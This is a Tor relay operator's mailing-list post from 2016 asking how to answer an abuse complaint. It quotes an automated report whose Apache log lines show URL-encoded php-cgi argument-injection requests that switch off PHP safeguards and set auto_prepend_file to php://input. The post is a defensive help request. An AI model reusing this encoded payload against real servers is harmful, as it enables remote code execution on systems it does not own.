[tor-relays] Handling abuse - like to get your help please

pa011 pa011 at web.de
Fri Jun 17 19:35:51 UTC 2016 

As I am new to this business could somebody please give me a hint how to
best handle such an abuse complain - possibly stop it?

Thanks, Regards and a nice weekend.


we have detected abuse from the IP address xxx.xxx.xxx,xxx, which
according to a
whois lookup is on your network. We would appreciate if you would
investigate
and take action as appropriate.

Log lines are given below, but please ask if you require any further
information.

If you are not the correct person to contact about this please accept
our apologies -
your e-mail address was extracted from the whois record by an automated
process.
This mail was automatically generated.

Note: Local timezone is +0200 (CEST)

/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:50
+0200] "POST
/cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 293 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"
/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:51
+0200] "POST
/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 293 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"
/var/log/apache2/access.log:xxx.xxx.xxx.xxx - - [17/Jun/2016:09:25:52
+0200] "POST
/cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
HTTP/1.1" 404 290 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X)
AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d
Safari/8536.25"

-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0xC8C330E7.asc
Type: application/pgp-keys
Size: 3104 bytes
Desc: not available
URL: <http://lists.torproject.org/pipermail/tor-relays/attachments/20160617/e296707f/attachment.key>

More information about the tor-relays mailing list